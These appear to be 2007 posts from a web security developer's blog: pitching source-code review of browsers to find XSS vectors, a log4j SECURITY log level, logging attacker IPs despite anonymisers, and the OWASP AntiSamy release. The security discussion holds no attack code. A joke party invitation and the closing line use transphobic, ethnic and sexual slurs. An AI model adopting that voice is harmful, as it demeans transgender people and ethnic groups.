because arshan's too cheap to license OneNote

So I took the opportunity during the OWASP San Jose conference to throw some of the ideas I’ve had bouncing around in my head at people. One of the things I was talking about was how strangely inefficient I thought the current XSS attack vector discovery paradigm was. What led me to this revelation was the realization that there was a paradigm at all. Small group of industry thought leaders + army of XSS fan boys/glory seekers + incomplete auditing style = fail. I’m not sure if that equation I just made up is mathematically sound, but it has more 1 reference to lolcats than other equations, and that’s in honor of the proud new dad on the block, Mr. Andrew van der Stock.

Every time we recognize another location where JavaScript can occur, or discover another encoding or fragmenting attack that, for some god awful reason or another, works in a major browser, we e-mail RSnake and he puts it in his cheat sheet, or we submit it to gnucitizen’s xssDB project. We’re doing the whole thing backwards, at least for open source browsers (Firefox, Konqueror – oh god, has anyone checked Lynx?) or open source browser engines (Safari’s WebKit). We can’t get a peek into the source code for some browsers (Opera, IE), but they should follow the same advice.

Start with the code.

Right now, we’re treating XSS attack vector discovery like it’s a blackbox penetration test. Open up the source and let’s work this thing from the other side! As someone with a good bit of experience not sucking ass at writing or reviewing code, I can tell you that we can provide a lot higher assurance if we review the code of the browsers in an organized way, rather than the current methods of discovery, which I will sum up here:

  • mistype an already known XSS vector and accidentally discover a new one
  • encode an existing XSS vector in a new way
  • use some kind of crazy insight/gut feeling to test a theory you pulled from the clear blue sky

Relying on these 3 techniques has gotten us this far – but do we really want to rely on these forever? Bonus follow up question: do you think all the XSS attacks have been discovered? If so, they’re always looking for new employees at the US Patent Office.

Man, I can see the flames now. Well, Mr. Smartypants, if it’s so easy, why don’t you do it? Reviewing a large application or an engine is not a job for one person. Incidentally, it’s also not a job for one team. With the amount of professional code reviewers out there, this could very easily be a community project (OWASP Spring of Code 2008, maybe?). A lot of eggs are in the browsers’ basket – and this is a way that we could help. I for one, will be looking at some browser code in my spare time and I’d encourage everyone else to do the same. Like my boss Dave Wichers said, there’s 5 billion web users, hundreds of thousands of companies writing web applications, and 6 browsers. Obviously, the most bang for your security buck will be with browser changes. That’s not to say the browsers can fix everything, because they can’t – but there’s no excuse for not fixing something that can be fixed there.

So, I gave this pitch to Jeff Williams and RSnake (do I really have to call you that?), and they both liked the idea. RSnake’s answer was funny, though. He said that he had indeed tried to do this a while back and that was how he discovered one 0-day vector. Unfortunately, though, he found the code to be such spaghetti that he couldn’t really make heads or tails of it. My response was, “Well, you should be able to look at the JavaScript engine and see where it gets invoked from”, to which he replied, “You’d think.” However, by his own admission, RSnake is the worst programmer in the world. So, grain of salt there.

One of the things I always bitch about when teaching web application security is the fact that log4j (and all its implementations in other languages) don’t have a “security” log level. How can you have a plan for security auditing if your log messages are spread out across all the different security levels and among all the noise generated by your application? The log files are already more incoherent than WWF trash talk, but at least with a “security” log level we can “filter” our security messages to facilitate some useful incident response.

So during my most recent class at the OWASP conference my new friend Roman Hustad burned half a calorie typing “creating a new log level in log4j” into Google and figured out how I could create a solution to all my whining. It was one of those moments where I realized that I had been bitching for so long that I forgot to ever try to fix the problem myself. So, to make it up to all the students who had to put up with my bitching, here you go. Here’s how you add a SECURITY log level to log4j complete with documentation and test cases.

While we’re on the subject of logging/IR, I was talking to some people at the conference about the use of Tor to anonymize all layer 7 attacks. There’s a lot of people parroting the idea that the source IP is useless because it can be spoofed. If I’m doing IR, spoofing is the last thing I’m thinking about. Spoofing an IP is fairly difficult for what’s usually not a whole lot of gain. Let’s take a step back and think about the different ways an attacker could hide the source of their attack:

  • By bouncing traffic off a public/misconfigured HTTP proxy
  • Launching the attack without hiding its source, at the tail end of a chain of compromised hosts (think that’s hard? go scan a 3rd world country for PHF vulnerabilities, circa 1996)
  • An anonymizing system like Tor or the old Freedom NET
  • IP spoofing

Which of these do you think an attacker with half going to do? Anyway, I got the feeling some people took away the idea that it was useless to log the source IP, which wasn’t my intention at all. That’d be like the Attorney General telling the police commissioners – “Listen, people can wear gloves when they stab/shoot/rape/donkey punch each other, so there’s no use in collecting fingerprints.” Not at all. That’s right, I just likened myself to the Attorney General. So, in conclusion, an attacker who has more than half a brain and the ability to use Google is going to make himself untraceable, but routine police work solves a lot of crimes.

December 21st, 2007. Everyone is invited. Here’s a copy of my Evite.

To whom it should definitely concern,

I am Chuck Norris. You may know me as the guy who can divide by zero, or the guy who can believe it’s not butter, or the guy who can touch MC Hammer. These are all known facts about me [1]. It has come to my attention that an inadequate amount of praise has been heaped upon my karate instructor and personal trainer, a man named Arshan Dabirsiaghi. To indicate his importance I have setup an annual party coinciding with the birth of your savior, Jesus Christ, in order to allow you a single night to pay homage to him.

If it were my party you were ditching I would simply have sex with your planet until it blew up in pure geological ecstasy, but he shows a compassion for you that I would not have for my own son, were he not able to donkey punch a nun to death by the age of 3 roundhouse kicks[2][3].

I offer you his one opportunity to redeem your race. Come, pay homage and deliver praise like you don’t want to be speared by my fist like a deliciously seasoned lamb kabob with onions and peppers. If you doubt my power, just realize that in late 1997 I farted and 6 months later El Nino had killed forty thousand people. Fulfill your obligation or I will cancel your race like Battlestar Galactica with a single roundhouse kick to the core of the Earth. I am a fair person. When I want to fight, I always go against the odds. A single ninja can kill a whole town of peasants so I try to only fight whole towns of ninjas just after snacking on AIDS cookies. If a single ninja survives my initial roundhouse kick I headbutt him underneath the universe where he gets stuck for about 5 minutes before he eventually dies of massive regret for not using the Total Gym.

In this spirit of fairness I am arranging non-lethal accommodations for this party which should be favorable to a majority of humans based on my experience spent as a Ranger in Texas:

– Food provided by Panda Express
– Two kegs (Miller Lite and Something Darker)
– Beer pong
– Flip cup
– Classic, insulting decor
– Post-op transgender turbosluts

Also, no Polish.

Chuck Norris
Principal Roundhouse Kick Engineer
Scranton, PA

P.S. Dad, stop acting like I’m a steamboat operator.

2. Roundhouse kicks are the only unit of measurement of any kind.

I’m releasing the OWASP AntiSamy project today. I have a host of early adopters from big name companies who are looking to integrate the solution, including Sun, eBay and more. While it’s really exciting that I’m getting some instant traction, I know there is a lot of work ahead. The framework is in place and the theoretical solution is now out there, but we need implementations in .NET and PHP as soon as humanly possible.

To download the code, the binaries, JavaDocs and all the normal distribution stuff, please visit the project page on Google Code. To test a live AntiSamy demo, visit my test page where you can attack a number of different policy files. There’s also a paper I wrote (PDF) which explains the design choices I made when building AntiSamy. It doubles as an academic overview of the framework. Finally, there’s the slides I presented at the OWASP & WASC Fall 2007 conference in San Jose. More on that in a future post.

Wider usage means more people looking at the problem and establishing more useful policy files. If you are interested in helping out, please let me know. I talked to a couple people at the conference from Zend and a few people from the Rails community that were interested, so I’m counting on those people to drop me a line. I plan on writing the .NET version since that’s a language that I know with at least a passing familiarity.

Like I wrote on RSnake’s site, I’m not just looking for ways to bypass the security filter. If you can find one, that’s great (sort of). I’m also looking for usability requests or suggestions. Throughout the development of AntiSamy I tried to imagine myself as the developer at MySpace faced with the Herculean task of only allowing non-malicious HTML/CSS. I figure if that guy can utilize the API in a usable way, then anyone can. Unfortunately, that guy probably killed himself a long time ago.

I was basically afraid that no one would invite me to the cool parties unless I got a blog. So, here’s my blog. Once this whole Internet fad is over, those people at the parties are going to be embarrassed. Did you know the word “embarrassed” is roughly equivalent to the word “pregnant” in Spanish?

You should be embarrassed, you dirty Spanish slut.